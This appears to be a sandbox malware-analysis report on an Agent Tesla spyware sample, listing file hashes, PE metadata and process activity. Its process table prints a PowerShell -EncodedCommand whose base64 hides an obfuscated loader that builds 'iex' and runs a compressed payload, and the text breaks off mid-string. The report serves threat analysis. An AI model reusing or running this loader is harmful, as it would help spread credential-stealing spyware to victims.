| File name: | main.exe |
| Full analysis: | https://app.any.run/tasks/5ed1818c-5dda-48d9-beb9-72b97e4a859a |
| Verdict: | Malicious activity |
| Threats: | Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold. |
| Analysis date: | June 20, 2025, 22:37:57 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.microsoft.portable-executable |
| File info: | PE32+ executable (console) x86-64, for MS Windows, 7 sections |
| MD5: | C942A56638772644D847709D906FA23D |
| SHA1: | 12D6B77FEC2244CDC4050A083AA741185CC48010 |
| SHA256: | 56A28391D309102557FCF9BC34351A50B49054282F2007851DCBC4E825E7C37A |
| SSDEEP: | 98304:R/0Cg6brcfRkzKVfq7AnYRO4Y6ZhkDQet54netUjZUj0vNQLFZfQpyJoic3yjHFD:ivfkEwE1MUQ881mw02/ki+BIsG |
| .exe | | | Win64 Executable (generic) (87.3) |
|---|---|---|
| .exe | | | Generic Win/DOS Executable (6.3) |
| .exe | | | DOS Executable Generic (6.3) |
| MachineType: | AMD AMD64 |
|---|---|
| TimeStamp: | 2025:06:19 18:59:12+00:00 |
| ImageFileCharacteristics: | Executable, Large address aware |
| PEType: | PE32+ |
| LinkerVersion: | 14.43 |
| CodeSize: | 178688 |
| InitializedDataSize: | 154624 |
| UninitializedDataSize: | - |
| EntryPoint: | 0xc380 |
| OSVersion: | 6 |
| ImageVersion: | - |
| SubsystemVersion: | 6 |
| Subsystem: | Windows command line |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 592 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 728 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 756 | C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -OutputFormat Text -EncodedCommand "IwAgADcAZABSAGcARABvAC0AYQA9ADUAfQBLAHcAWQBrADkAegApAEMAbgAwADcATQBPACQAZgBOADoAdgBrAE0ALQBpAG4AQwBkACgAJAAtAFcAPQB6AEgANgBaADoAOwBMAGEAaABTADUAeQBoAG0ANgBJAF8ANgAjAHUAYgA5AHQAegAlAEAAUgBRAD4AYwBkADIAcQA5AEcAOQAzAEYAZQBOAHQAJQAkAF8AUQBSAFYALAApAE8AbABdACgAfABHAD4AQQAjAHEALQBiAFUAUQAtAE0AKwBCAGMAeABVAHYAOgBBAHQAVAAuAFgAfABZAGQAbwBwACQARwA6AFgAUQBUAFgAdQBPAHAAMQBbADEAUgBwADMAbwAhAEUANQA9AEcAVAB3AD8ANwBNACwAUABDACwARABmAFQAVAAxAGEAUABWAHwAKgBhAEoAYwB7AFQAfQBXAE8ANwAmADwAMwA2AHEANQBLAE0AZgBKAGYAWgBUAFQALgAyAGIAMwB6ADoAZQBIACUATwB0AEwAUAA/AHoAWABYACwAaQBeAE4AJQBdAGoATgAlAH0ANQBfAHYALABwAG0AQgBsAEkAbAA9ADsANgByAHIAawBLAFQAbAAwAGsAZwA8ADgAbQAsAD4AIQA3AHkAdwBWADsAQgBQAHIAewBpAF4ARQAgAEgAPwBKAF8AYwBTAFQAagBLACwAagAsAGgAMQBUAE0ASQAyACEANwAqAHUAbABnAFEAWAAuACgARwAuADUAegB1AF8AIAA4AF0AZAA4ACMAaQBZAG4AOwAkAC0AUQAtADYAKQArAE4AOQBqAGwAJgBDAE0AUwAoAE0AQAA0AH0AagBpAFQAQABpAGkAXwB0AGoAMAApAEsAKgBoAEUAQgB8ADwAfABrAHQAcgB0ADAAQQAlAE0AKAAxACwAWABzAGsAbgBPADoASgB5AGgASQBZAFgATwByAEYAXgAtACsAeQBYAE8AcAB7AD0AbgBjAHYAQAB6AE4AXgBPAEgAZgBxADAAIwAhAC4AMgBGAD4AXQAmAC4ALgBLAHcAUgBDAFYAOABkAEQAKQAjADUAJQAqADgAVgBaAG8APwBEAF4ATgB0ADIAZQBXAEAANwB5AGMAUQArAHwAQABNAG0ATQB2AFMAWQBiACkAMwBwAG0AcABVAHQAMwBlADsAeQAzAHoAQgB4ADcAZABwAG4AJAA5AHUARQA5AEsAXgBHADcALgBkAFAAQwB2AG8AYgAlAHsAXwBmAFQAcgAxAF8ARwBfAFMAMgBfAD8AZwBzAEQAXgA7AHsAKAAgACAAaABnAH0ARwBvADYAQQB9AEcAdQB8AG4AIwB1AGMANAApAFQAUwAkAGcAYQBXADAAMwBqACYASwBBACYAQAA3AFYAPgBvACkAOQBTAFsAWAAmAGcAKQBYACkAUwBdADcAJQBEAH0AdQAqAEUAXwAxAHUAYwBIAGIANABvACQAWgBtACEAegBjAGMAPwAwAEIAdwA/ADUAWgBsADgANgB9AF8AOwBtAH0AbgByAF4AIwBPAEcAMwBJAD8AYQA6AFkARABjAFkAPAArAHIAKQBKAGgAWABXAGIAMwB2AEMAOABTAFgAXQApADUAewBLACUAWQBYAEIARgBaAHsAaQA1ACYAOwBoAEoARABKAHQAQQBNAD0AKgBTAG8APQA0AF4AawAkAEYAVQB3ADEAQgBvAFgATwBAAGIAUwBMAGsAOQA7ADcAYwBUAFMAaABHACwAegBYAG8ATwB0AGYAJgBXAH0AWQBVADsAcQB2AEUARQBmAGkAWwAzAE0AQAAzACkAOwAuAF4ANQBVACoAZgB2AE8AWwB9AHQAbAAzAE0ARgBRAHUAPgApAEMAPABnACQAOgBPADcAWQA8ADkAKABCAHQAWgAkAGQAbABoAHoAfAA8AG8AIwAuAGkAMgByAEMAUwBzAGwANgBaAEMAWgA5ACEAZAAtAHgAeQBrAGwAfQB0ACYARQBsAFoATAAhAEAAZQAtACwANQAtAGMAQQB3ACgATwBOAC4AXwAjAEkATwA3AFAAVAAoACQAegBpACwAbwBdADQAfQBEACYAdAA5ADYAdgBCAA0ACgAgACAAIwAgAHYAeQBfAG4ANQBiAHgAQwBSADAAPABXADsAawA3ACoAdwAxAHYAYQBuAGYAZQAkAD4ATQBfAD8ALgB2AGwAdQB1AF8APwA2AE8AeAAuAFcAXQB1ADQAfQBdAFoAOABjAEoAVgBOAF4AJQBJAHoAZwBIAGYAZgAgACEAWgA5AF8AaABxAHIANgAzAFQAcwBIAFQATABaADQALAA8AE0AOgAjAFcAOgArAGwAcQBIAC4AMgByAEoAdwB5AFAAaAB2ADEAMgA7AFMAQgA8AEUAbwBLAFoAJABmADAAVwBBAHYAIwAzAF0ASQBYAGIAZABUAC4AWwBDADIAQwBeACMAewBtACAAawBfAHkAaAA4AEMAZgA2ACEAUgBhAFIAXwBeAG0ATgBHAFoAaQBPACUAYQBPAFkAegBiACwASwAuAHwAdABHACsAYwBlAFoAWABkADUAVQBaADQASABXAFYARwBEAG4AewBjADwAMgBFAGUAIwB2AGgAKQB7AEkAKQBZAEoAJABUAGQAPgA7ACEAewA8AEUAewA0ACkAYwBvAGwARwB2AEsAbABtAEcAZAB2ACYAQwBeAHAALgBXACUAcQBwAFMARgBhACsANgBoACsAKwA2AGYANABKADMAewBvAGwAOABzAC0AZwA1AEoASABRAC0ASwBVAHkAVwA9AFUAeQBWADsAdQBlAHkAdwBCAHoANABUACEAOwAzADEAIQBnAEkAOQAkAEcAIQAkAGgAMQBAAFoAPABXAG0AVgBYAGUAegB8AG0AQgB7AGQAKwBnAEsAXwAjAD4AYQBUAFsAPABuAE4AIAAlACQAKAA6ACMAQQB1AD8ARwA8ACEAXgAoAC4ATgAwAHEASABEAHYAfABoADQASgAkAG4AKgBMAEoAfQArAHwARwA1AFAAawA6AHkATQB8AH0AWABXAHYATwBtADQASgArAE4AdwBAAGEAWABDADIAMgAuACkAMwBhADYAJQA6AHoAQgBXAGQAbwBjAHUAcwBIACYATgBvAEoAcQB8AFMASQBoADsAXwAzAFQAVABNACsAawA2AFUANgB0ACsAdwBqADcAcwBfAFoASAB4AFsAWQB6ACUAVwBAADAAQgA8AFoANQA6ACkAQwBqAGoALQBSAGgAMgBBAHgAZwB9ADsAKgBLAFsASABbAFEAVwBjAHQANwBNAG4AMgAkAHIAbwByAF4AYQB9AFIAaQBbAGQAWAB2AGkAQwBiAEUALQBPAFcAKABNAGcAMgArACYAawApAF8AbgBpAEoAKwBvAGIAKwAyAEoAJQBHACMALgA5AGMARwA+AFUARABwAFYATgA6AF0APgA/AHkATgA8AGkAPQB3AC0AaQA9AGQAYQAoACwAbwBTADgAWABoADQAfQAgAGQAMAA7AGgAIQAjAFkAXgAgAEQAaAA/AHYAdgBLAHYAYQArAHkALQA4AF0AXgA2ADgAcgBQAGoAbQAmACUAdQBGADsASABvAHgALgBpAFYAeQArACEAUgBKAEUAMgBsAGcAPABeAHYAdgAgADYALQAoACkAWwBEADIATAAqAEYAXQAzAEgAVQA3AE8AWwAjAEYAZQA5AFMAZwB0AEkALABuAGcAZgBdAEIAMgB3AHMAYwBxAHsAPgBqAF0AcgA+ACkANABOAEYAOgBaAGkATwBMAEIANABIAEgATwBPAFgAXQB5ACMAVwBFAD8AcgAoAEAASgBnAGgARABZAFQAewAxAF4AXgAjAH0AfABdAEEAcQB6AHYAUgBJAGMAMABGAG0AKAA8AHwATABqAGUAUwA5ADwAOAA8AHAATgBBAEgAQQByAGQAdgA1AFEAKgAwAGIAKgBVAHsATAA4AC0AOQB8AGYAIwAjAHIANABWAG0AcwB6AHYAYwAqAEQAOgA8AFoAbQB6AHYAdAAtAFIAKQBVAEYAdABGAFcAWQAoAHMALQAwAD4AVwB2AEIAZAA5AHYAWwBeAHQAegA+AFYAIABlAEIAKAB6AEMAeABeAG0AKgA3AEIAZgBLAHUAaAAtAHkARABrACwAcABmADYAWQBmAFsAYwBfAGUAdQBZAGwAUQBKADkAdABoACAAcABeAD4AMQB0AHYAZAB5AGYAXwA9AGkAfQB7ADMAXQBlAGMAKQAmAC0APABnAEMAdQBRACEARgB4AEgALQBRACEAMABDAFcAKQA9AGsASgBnACMARQBvACEATAA4AGoANQBRAHQAKwBXAF0AKwBrAHsASAAzACMAMAAsAEMAYgBdADwAaABKAE4ASgA/AGcAcAA/AD8AXwBKAGwAVgArAG0AYgBWAEoAZAA1AHEARAAyAGYANgA0AGoAbQBQAHAAQgBTAG0AOwBQAE8AeQBTAEkAfQAuACQAbQBJAEkAMwBhACQASgBUAGEAfQAsACsAcQBhAEIAeQA5AGkAVABlAGsAIwBhAGsAdgArAHsAOgB7AG8AeQBkAHYADQAKACAAIAAgACAAIAAgACQAYQA9ACAAIAA4ADgANwAyADsADQAKACAAJABiAD0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAGEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAdABtAHAANwA2AEQANAAuAHQAbQBwACcAOwAgACAAIAAgACAAIAAgACAAJgAoACQAcwBoAEUAbABsAGkAZABbADEAXQArACQAUwBIAEUATABsAEkARABbADEAMwBdACsAJwB4ACcAKQAoAG4ARQB3AC0AbwBCAGoARQBDAFQAIAAgAHMAeQBzAHQARQBtAC4ASQBvAC4AQwBvAG0AUABSAEUAUwBzAEkATwBuAC4ARABFAGYAbABhAFQAZQBzAFQAUgBFAGEATQAoAFsAaQBPAC4AbQBlAE0ATwBSAHkAcwB0AFIARQBhAE0AXQAgACAAIABbAGMATwBuAHYARQByAHQAXQA6ADoAZgByAG8ATQBCAEEAUwBFADYANABzAHQAcgBpAG4ARwAoACcAcABWAFQAUgBiAHQAbwB3AEYASAAyAHYAeABEADkANABpAEkAZABFAE0AcwBpAGoAYQBKAHEASwBJAHAAVwBHAGQAcQB2AFUAYQBoAFYAMABXAHoAWABFAGcAMABsAHUAUwBUAFQASABqAGgAeQBuAEQAUwB2ADcAOQA5ADAAawBaAG8AVQB1AEcAMABWADcAaQBlACsATgA3AFgAUAB1ADkAVABuADIASwBBAHkANwB0ADYAcwBVAFMAUABVAGQAdwAzADAAcwBZAHgATQByAFMAVQA3AGIAcgBhAE0AOABpACsAVwBTAFQARgBlAFoAZwBXAFIASQB0AHIAUABlAEoASgBjAG0AVABxAEIAMwBLAFEAMQBvAGwAVQA1AEIAUAA4AFEAQgBaAE0AUABXAFUAWgBvAHYAUgBCAHkAUQBRAFAAQQBzAEkAMwBkAFAASgBGAEEAeQBNAHkAUwBQAHAAUwBFAGoAagB4AFcATQBzAFQANAA5AEsANABNAEIAWQA5AFMAdgAvADcAeQBuADQAeQByAG8ATQAzAHAAZQBCAFcAOABaAEkAcwAzAEcAUQBsAHcAbQBxAGQATABHAGEAWAA4AEgATABVAEUAYwA5ADkAdgB1AFAARABQAGMASQBBAEUAVQB5AEMAdwBKAEYAbgBCAGoATgBQAG0AVQBnAHIAegBSAEMAawB2AEkAbgBJAHEAcgBvAEEAdQBsAEIARgBuAFIASwB2AHYAaAB2AGgAYQB2ADIAdQBVAEwAbABjAEYASABMAGsATQBCAGoAaQBVAG8AWABvADEAZwBOADMAeQBKAHQAYwBtADUARwBBAG0AaABnAHYAUABpAE4AdwB5ADEAdwBhAGEAdwBlAHUARAAxAHMARABpAHMAegBLADgANgBOAG0AQwA3AHYAbwBaAEUANgBWAFUARAB6AFcASgBsAFkARABaAC8ASgBsAEsANQBWAGUATgBBAE0AdABzAFAAMABoAGsASQBUAEcATgBIAG4AMgAzADAAMwAxAHcAWABJAHMAKwBpAFMALwBTAE4AegBvAFAAUwBqAFQANABQAEkAdgBnAFgANABhAEgAaQArAEIAcQA0AGcAUQBtAGUAbQBZAEgAYgBDAEoAUAB3ADcAdwBMAFoAbgBHACsAQwBSAFQAMABSAGIAUABMAFEAZgBYAGEAOQBKAGEAdQBhAG0ATgBSAEcAVABEAGMASwBoAE8ANgBUADMAUgBGADUAMgAzAFkAZAByAGMALwBXAC8AbgBxADgAUABxAGYAMwBYAEcAUgBBADAAeABJAHYAdgBuAGMAaQB6ADYAdgBYADkANwA3AGgARgBYAE0AMQBtAEIAdwBiAHEATgBZAE0ATABWAEQAaQB2AFgAQgBaAFIATABlADIAMABLAG8AQQBOACsAeABkAGcAVgB5AGEAaQBMAEwAaQBHAE8ALwBhAG0AaABWADkASABEAEEAYgBNAE0AdQBVADcARABJADkAYgBkAHMALwBjAG8AYwA3AHoARAArAHIAcAB0AFMAUQA0AEwANAAzAGYAMwBnAGkAbwBnAGwAMQByAEMAcgBiAHgAQQBOAFcAZQBVAEcANQBlADgARAB4AHoAUwBuAGgASAA0AGMAbABlAG8ATwA5AFMALwB6AHcAWgBWADgAbAA4AHUATgArADUAQgBLAHkAMgBWAGkATgBWAGUAOABIAHQAQwBJAFkAcgA4AEYATgB1ADAASQB3AEoATgBqAE4AdAA4ACsANwBGAHMARQBjAEkAawBMAHoASgBIAGEARgBjADEAaABaACsANQBSADAAcgA3AGgAYwA1AG4AdwBKAHgASgA5AEcAWABLAGUAdABvADAANwBvAHoAWAB3AGwASAAwAEMAYgArAGMAbgBKAGgAVgBiAEoARwBjAC8AZwAzAFcAQgBxAE4ARAA3AHMAagB2AE0AQgBUAEIAZgBuAEQAYQBBAEEAMwBRAGwALwBKAEoAMgBGADYAKwBLADEAdQBzAFAAVgBFADIAZABXAG4AdgBsAHgAZgA5ADcAaAB0AEIAUABpADcAMQA4AD0AJwAgACAAIAApACwAIAAgACAAIAAgACAAIAAgAFsAcwB5AFMAVABlAE0ALgBJAG8ALgBDAE8AbQBQAHIAZQBTAHMAaQBPAE4ALgBjAE8AbQBwAHIAZQBTAFMAaQBPAG4ATQBvAGQAZQBdADoAOgBkAEUAQwBvAG0AcAByAGUAUwBTACAAIAAgACAAKQB8ACAAIAAlACAAIAAgACAAIAB7ACAAIAAgACAAIAAgAG4ARQB3AC0AbwBCAGoARQBDAFQAIAAgACAAIAAgAEkATwAuAHMAdABSAGUAYQBtAHIAZQBhAGQARQBSACgAIAAgACQAXwAsAFsAUwBZAFMAVABlAG0ALgBUAGUAeAB0AC4AZQBuAGMAbwBEAGkATgBHAF0AOgA6AEEAcwBjAGkASQAgACAAIAAgACAAIAAgACkAfQANAAoAIAAgACAAIAAjACAAPQBRAGwAPwBrAFEAWQBEAGYAYwBSAFsATQBIADEAagBsACYAPgBqAGYASgA0ACAALQBhADkAdwBoAGoATgBvADcANABJADcAOgBvADMATwBwAHwANwBHADwAKgApAHMAewAlAEsAVABjAHoAegBGADIAOQB5AHEAewBMACgAYwA6AD4AbQAwACoAVgA4AHwAVgBjADgAOAAkACgASgAsAF0AegBlAEcAWgBoAFsATwA1AHIASgB4AFsAXwBhADMAfABpAFYAfABFAG8AMQA7AHoAJgA3AF8ASwBPAHMAMwBIAGoANgBrAFsAZwB7AH0APAA6ADgAIQBTADcAQQBMAGQAUAArADUAZABLADsAZAA/AFYAZgBmAE0AYwB6AFkAcQA5AGIAZAAsAHAAPgAjADsAIABvAEwAVQBwAEQAMgAtAC0AcQBDAGsAVwBMADIASQA1AEsAYQB3AFgAUAAhADwANAArAHEAUwB2ACUAbwBZAFoATAB5AGsAPgAkADkAJgAzAGIAawBxAHoAQQBaAEwANgBtAG8AbABrAEcAMgApACgAMgBGAEgAdwBjAEUAJQB7AEwAIABQAGUARAB6ACUAbwBCADIAJABZACAAVgBOAD0ALQAzAGEALABFAGgAUQB9ACsAcwBIAGIAfAA9ADgAaQBYACAAbQB6AFMAWQBCAD8AcQBWAEcAeQA2ACMAaQBVAGUAZgApACgAWQB5AD0AaABiACsALQBxAE0AJABpAHIAOgAgAEQAbQAoAHAANwAwAFgARwA7AD0AUABoADsAaQB4ACkAOQA9AD0ATQBqADsAIQBTAE8AewBNACkAYQAoAHwAaQBSAC4ANQAyACAAbQA7AEwAdQBSADsAdgBTAHoASwBvADsAZAB7AGoALAA3AGcAdgB6AFcAUABwAHQAOgBvAD0ALQA1AG4AfQAzAEsATgAkAHgAKQBTADIANQBYAD4ATQA/AHQASQB2AF8AeABRAGYAMAAjAC0AJgAkAGwAYQBiADUAQQAmAE8AagA9AH0AdwApAEMAcwBvAHoAfAAxAG4AeAAhAEwAZwBkACUAZgB7ACAAVwBpAEEATwBQACoASgAhAFQAIwBOAHsAcgA1AHUANgBjACYAfAB8ADAANgBaAEsAKABsAEQAMABYAHEAfABVAHYAZgBNAFQAWQAxADYANABNAGMAewAwAFoAQwAsACsAQAAmADAAIABbAFIAYgBiADEAbQBqAFcAIAA2AF0AeQBAADYAQABmAHcAXQBuAGIAPABhAHEASgAyAG4AOQB5AHkAewBIAG8AKAArAFUAOABpAHYANQA0AFkATQBMAGcAMQA6AD4AKQBJACsAbQB9AFsAOgB9AEcATABuAHUAewAmADsAUgBDAFcAJQB7AGIATgA1AHwAIwAsAFAAUwAqADcAJQB9AHYAOQB7AFEAPgBSACoAYQBGAHwALABvAGEAdgB0ADsAdABaADoAKgAkADgAcwA5AHcAZwBtAEMAYwBpACgAXwBJAEUAawBRAF0AZABJAHIAWgA2AE8AbwAzAE0ASgAsAEwAPwBTAFgAUQBAACwASAAsAGQASAAmADQAcABAAHgAeAA8ADgALgBjAFcAUwBMAD8ANQBxAHsAVABdAFUAMABkADoAIABAAFYAOgA0AGcAOwAoAHkAKAA7AFgAWAA8AFUAaAA0ACwAKgBTAHoAUQBSAEQAOgB0AHcAcwBiAFEAIwAkAEIAOgAsACwAQQBHADMAWAApACoAdwA8AEcAOgA/AFUAKwA9AFYAXwBQAEkAaAAmAFgAWgBuAGMAUgBiAHcAJABaAGUAXwAzAHoAIwBnACQAcwA6AFAAZABCAE0AdQBTAEMAOAAuACYANQBqAGwAIwBzAGMAMABNAGwADQAKACAAIAAgACAAIAAjACAAbQBMAGwARwB3ACYAeABrAGsAWwBVAFoAfQBwAHgAPQBDAFIAfQAjAE4ALQApAFIALABaAFIANQBsAHQAQwBJAFoAQQBCAGQAfAB5AEkAQAAyAHAAKABuAE4AMwBKAG4ATABJAGcANAA9ACsAaQBdACoALAAtAC0AWwBxADoAVgBEAG0AbwBhACAAVQBHAHcAWwBPAF8AWAArADYAXgBpAFoALABXAGoAawA4ADsAKQA9AGwAUQBEAGkAVQB9ADkAWABxAHUAagBZAFYAZQBfAEwAMABjADUAMABQADcAIABsAD0AVABrAEAAZQBkAEAAQgBxAGoALgAtAEgAegAhAEYAQgA5ADUAIwBnAGQALAAhACsAVABSADQAaAAlAE0AXgB2ADQATQBYAFkAKgApACQARwA3AE0APwA8ADYATQAxACMAJQBlAEoAOwBTAE0AZwBCAE0AQgBtAD8AVQBlADUALQBSAEgAdgAwAG8AKgAlAD0AbgB5AEEAMABvACkAIQA7AG4AZgBqACMAMgA1ADIAOABdADcAXQBDAEkAQgBzAEkAKwB7AF4AeAAyACQAOQBHAHgAcwAmAHUAJQBDADUASAA8AGIAUABhAHMAdQB2ACMARABuAFQATQBoADoAZgBvAEsAVwAxAGYAagB8AGQAOQBHADAAVwAoAF0ASABNAEAANQBDAFMAbgBQACAAOwB8AFsAPgBLACsAOQAkAH0AcwBSAGUAZABlAEEAXgBxAFcAdgA1AFMAMwBlADMAIwAkAEYAMgBaADMAUQBRADMAKAAhAGQAMQA+AEEAcgBSAFoANABjAFoAJAA1ADsAMQAxAE8ANQBKADMAPgBzAGgAPAAqAGwANABqAE0AVwBrAF0AOgB3AEYAJQA9AFcAdAA1AGwASwBlAG4AQgBFADEARQA3AGIAMgAgAFcAcwBrAFMAawBkAHsAJQByAEwAcQBtACAAVgAjAGsANQA6ADMAWQBkAHcATwBKAG0AUQBzAEcASQBEAGkARgBTAGwATgBqACoALgBjAFQASQBFAF4AQgA2AFAAPAB2AD4ADQAKACAAIAAgACAAIAAgACAAIAAjACAASABRACQAIQBLAHcARgBEADgAOQBOACYAcAAsACwASgBoADcANgA5AGoAKgA8ACQAfQBbAEoAWQB3AD4AMwBSAEkAOQBHAF4AegBWAEEAaQA/ACAAegA9AFcAWABxAEgAPQBVAFkATQBrAEYANQArACQAPgA8AHsAawBmAEsAYwAjAFcAXgApACwAPgBkAD0AKwB9AGkAewBIAHYAQwBhAHkARwByACkAQAB3AGQAbABuAGoANAByAHoAXgBzACQAcQBJAE4AQgAmADwAKAA4ADAAOAB1AFMAQwAzAHMAMwBrAGsANABoAD0ALgB7AHEAWABVADsAOQB9AGMANwA9AEAAeQBVAC0AagBlAHkAegAmADgAZABNAH0AdwBBAG4AVQBoAEkAbQApACsAeQBHADwAMwBAAEAARQBAAE0AVQBZAG0AcwBiAHQAKABAACUAOgBIAD8AOwBtAGkASABhAEAAbQB9ACwAfQBvAEMASABIACsASQBTAFgAIQA/AH0AVQA9ACgAMAApAEsAbQBzADwAPQBFADkANQB7AE4AOQAtADkAagB9AD4AaQBYAH0AVQBdAHEAWwBnACAAZwA1AGQAcgB8AFgAVQBrAE8AWgBPAF0APABHAHwAIwBBADgAOwArADoAbwAhAHcAZgB4AE8APQBYACsAVAA5AFsATgBZADMAJQB8AGsAQAA5AG8AIwArAGIAIQBoAF0AcwBpADoALgBxAGMAPQBSADMAbgApADkATAB2AFgAbgBTAHwASgB2AEEAPABYAD4AZAA8AG4AOgBQAHoAKAAhAC4AYwBUAHoAdgB4ACEAdQBqAFYANQBOAFoAaABSAHEAUQBuAD4AeABvAD0ALgBKACkAQwBIAFQAVgAzAD0AXwBSAFQAYwBjAE4AVwBNAHgAKgB8AD0AWABWAHQAPwBEAEsAZABfACEASQBXAF0ANABmAGYAKQB1ADMATwA3AGkASAAqAFgATgBJAFEARABZACAAdAAmAD0AbQBSAF0ATgBlAEQASABmADAAPQAsAGMAVAB5AHwATgAuADAAIwBeAGEAOgBTAFYANwAmAFgAaABIAFQAaQB8AGQAQQB7ADQAWABMAEUAVABnAEYAbQBGAHsATgB9AG4AcABpAGwAPwBDADkASAB8AFcATQBzAFQAMAB3AFkAbAAqAGoALQAsAHQARAAkADkANABtACAALgBSAHQAZwBjADkAPgAtACMAKAA7ADoANAAyAHIATgAsAF0APgBEAGUAQQA/ADoAcQBmACoAUgBQAFgAfQBoAF0APwA7AG4AUgBIAHMANABsAF0AeABNAEAAVQBuAHMAbQA5ADIAVQA7AHIAMAAuAGwAPwA9ADkAdwBYAEkAaQBoAF8AbABIACAATwBpAF0AMAAlACsAUwBUAEoAcwBGAG0AXQA7AD8AewAlAEMARQBIAG0AKQB7AGYAVgBmAFsATQA3AGoAaABSAGQAaABlAG0AaABSAHwAaAA9AH0AWwA9AGcAaAA2AC4AVwBeAEcAIABSAFAAcgBMADEAYQBCAGgARAA8ACQAfQBDADMATwBhACUALQBwAE8AOQB8AGIAcwBeADoAcAB0AFIALgBeAFQAaABlAEcAKQA/ADIAMQBpAFAAPwBjAHoAIwBFACYAQABfAD4ATwBFAD0ANQBhAGsAMQAgACsAbQBGAHcANwBDADgARwB4ADUAYwBRAEcAIwBQAGIALABLAHIAVgBvACMAcABNAEAAWwBoACoAUQBrACwAMgB6AGoANgB0ACQAQwBPADcAdABtAEAATAB5AC4AewBhADUANQAwAEcAWgBjAHkALQBDADgADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHwADQAKACAAIAAgACAAIAAgACAAIAAjACAAQAApAGUATwBPAGgATAA7ADoAJQBHADcAVwBkAEcANgA4AHkAOgArAH0AQQA/AE8AbwBOADQATAAhAHwAWgAoAGIAcwArADEAXwAgAG0AeABkADAAQgBXAHMAcwBuAGUAcQBBADYASAA7AD0AJgApAEgAbABUACQAYwBkAEEAJABMAEgAPQB5AEwAMwB4AGMATgB1AFoASQAuADgAeQBmAG4AKgBYAHAAegBAAG8APwA9AGsAMQBYAE4ARgB1AGMAcgBMAGEAdgBiAEQAbAAwAHcARwBKAEEALgBnAEkAQgB3ACUAewA5AGwAQABkAGwAYwAhAFQAfQB1AHEAMABpACYAcgB3AGEAWQB7ACsAWABUAGcAKgAsAGkAVQBJAEsARQBfAEUAewAtAG0AMgBjADcAQQA3AHMATwBRAEcAIwB8AHcAQABnAHIAewBKAE0AagB9ACMASQB2AFUAcwApADcAWwBfAF4AVgA9AEUAYwBeAFUANwAlACoAbwA+ADYASwBuADAAYgBLAFEAWgB1ACsAewBWACUAcABGAFkAQgAkAFQAcgBfAG8AWwBeAG8AcgBXAFYAKwA3AGkAZABGAGYAIAA1AGgAJABFACAAXQBtAEkASQAzAEIAUQAjAE0ATgApACUAQgA9AFIAcAA8ACUAVwApAD8ALgAkAEUAIABfAGMAWgB1AGQAKgA4AF4ANgB0ADEAUwBCAEYAJQBAAD4AbgB8ACwAMAAwAFMAKAB8ADIATwA2ADAARAB5AHYAaABjACQAfQBCAEIAewBFAFoATgBbAFcALQAlAGsANwB5ADEAUAA4AHgAcQAzAE8AKABiAEEAeQB4AGYAPgAzAE8AMQBTAGgARABkADQAPgAyAFoASABtACMAMgAxAGEAUwBJACgAVwAhADQAdQBGADoADQAKACAAIAAgACAAIAAgACAAJQAgACAAIAAgACAAewANAAoAIAAjACAAQgBbAG4AZABFACwATQBhAGYAWAB4AFMAeQByADcAUgBVAG4ASwBvADkASABkAHwAewBUAGIAeABTAFIAcgBDADgAbwA0AEMAKwBHAFAATAB3AEcAYQB8ACkAOgBPADIAQQBkAEQAKgAlACkAXgBwADkAYQBpADkAWABXAHgASgAgAG8ASgBrAD4ANgBvAEcAZAA2AEcAdwBZAEcALQBeACsAewA1AEIAMgBbAE4AZgBmAGcAJABLAHsAaQAhAHoAIwArADQAbwB9AD8AcABsADMAbABtACsAQQBiAG4AKgAmAE0AJABaAHsAaABYAHUAWwBrACgAegBMAGwATgAqAF4AMgBjAFEAMAB8AEEAPgA7AE0AMAAmAEUAXgBhAEwASgAsAEUAUgBAAGMAJgAgADgAQABZAHoAQgB0AEAAUgAhAG0AOgB9AHcAbwBpACwANQAoAEoARQBpAEAAPwBoAD4AOAApADUALgBXADMAeABqAHYAagBOAEEAWwBLAGcAJQAhAHMAQwBhADoATQA1AF0AMgB4ADUALABEAG0AZQAhAF8AWwA0AHEAMgBsAG0ALQBRAHoAWwBrAGIAQwBBAF8ASAA8ACwAWwAsACwAbwB8AHIASQB0AFoATgAgAEcAawB9ADQAVgBuAD4AXgBhAGwAJgB1AG0APgAsADQAWwBVAFoAagBvAE8AKgBFACkAVABKADsAIABJADkARABMAHIAdgAtACEAYwBoAHYAMAB7AGwAcwBsAFQARgB5AEsAMwBsADcAWgBJAFUAPQAyAE8AWAA8ACoAJgAoAC4AWQA2AHsAOwBJAFAAMgBUAFkARQAjADUAMwB3AC0AfABvAHcAQABHADUAPAA8AGcAYQBmAFAAdQAoAFAAUAB6AFUAXwBtAHwAYwBQAFgAXwBeAEgAVQBRAD0AUgAmADkAaQAhAGwANABoADkAOAB2AC0AIwBXAD0AOwA3AE4AbAAuAHsAKABiAFgAcQAoAHYATgBLAGcAbgBiAGsAaAA+AFsAcwBoAEcAJgA4AEcAaQB2ADYAcgAqAGMAfABPAFEATAB8AG8AKABfAG4ARAA1AFcAJgBhADoAbQBQAGIAcQA6ADsATQBiAHoASAA+AHMAQABEAD8AWABfAEQAdAAgAGIALAB4AE0ARwB0AGgAWwAuAGMALABJAD4AfQBFAHcAPwAmAG8AXwA6ADwAPABuACEAUABKAE8AQwBqAD8ATAA9ACsAZAA0AFAAQQAjAEMAbABUAHYAfQBtAHkAfAAkAGUATABaAFMAcAB5ACAALQB0ADoAQgBQAGMAagBBAHQAdgBiAHUAQwA1AFsASQBDADIAcgArACwAPwB4A